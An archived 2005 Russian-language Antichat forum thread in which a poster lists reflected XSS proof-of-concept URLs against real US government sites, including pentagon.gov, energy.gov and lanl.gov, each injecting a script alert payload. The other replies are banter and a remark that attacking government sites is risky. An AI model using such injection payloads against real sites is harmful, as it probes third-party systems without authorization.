Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS на сайте "Пентагона". Анархия в зоне "gov". (https://forum.antichat.xyz/showthread.php?t=10462)

k00p3r 01.11.2005 19:38

XSS на сайте "Пентагона". Анархия в зоне "gov".
 
Начал проверять гос. сайты на баги и так сказать, получился неплохой урожай ;-). Куча xss-багов и попался даже древний баг в open(). (Но о нём говорить не буду, т.к. сайт быстро снесут).
От xss конешн, сам понимаю толку никакого. Но всё равно впечатляет.
Начнём с малого:
http://search.access.gpo.gov/GPO/Sea...3C%2Fscript%3E
http://www.prc.gov/interrogatories.asp?irid=38516&irname=%3Cscript%3E alert(%22x%22)%3C/script%3E
http://www.stdgen.lanl.gov/cgi-bin/path_map.cgi?field=gene_id&term=MG142&mode=exact&d bname=%3Cscript%3Ealert(%22x%22)%3C/script%3E

На сайте http://www.energy.gov, поле SEARCH не фильтруется. Вводим туда простейшую конструкцию <script>alert("x")</script>, в результате выскакивает алерт.

И на сайте "немного" покрупнее....На сайте Пентагона.
http://www.pentagon.gov/srch/search?template=%2Fsearch%2Fresults-template-dl.html&c=%3Cscript%3Ealert(%22x%22)%3C/script%3E&c=8268333F54379065&c=6FDF5BD0BF338D19&c= 1DA2190B5E9F39D2&q=%3Cscript%3Ealert%28%22x%22%29% 3C%2Fscript%3E&submit=Search&subcat=briefing+slide s&sort=-pub_date

kot777 01.11.2005 19:52

Это ещё раз доказывает что уязвимости есть везде. Но я не думаю что кто-то из наших станет атаковать правительственные сайты, палевно это как-то

m0nzt3r 01.11.2005 21:13

ого =) давай выкладывай open() в 1 раздел :D

w4rd3n 01.11.2005 21:19

Может попробывать но Xss не добьешся нечего думаю админы на детскую шутку не купяться.

CinerX 15.03.2006 21:50

Огого!!! Ни че себе... На пентагоне... !!!!

Gang100 15.03.2006 22:13

очнулись блин :-/ link

CinerX 16.03.2006 01:15

Блин ... Вы запарили! Не было меня просто долго в сети! А щас наверствываю, то что я пропустил...

tclover 16.03.2006 01:19

Цитата:

01.11.2005, 12:38
А на дату публикации слабо посмотреть?

PinkPanther 16.03.2006 02:40

Цитата:

Сообщение от CinerX
Блин ... Вы запарили! Не было меня просто долго в сети! А щас наверствываю, то что я пропустил...

Чем наверстываеш? Флеймом? Нах так гнусно набивать се рейтинг? А насчет небыло в сети, посмотри на дату поста и на дату своей регистрации....

CLOSED


Время: 01:52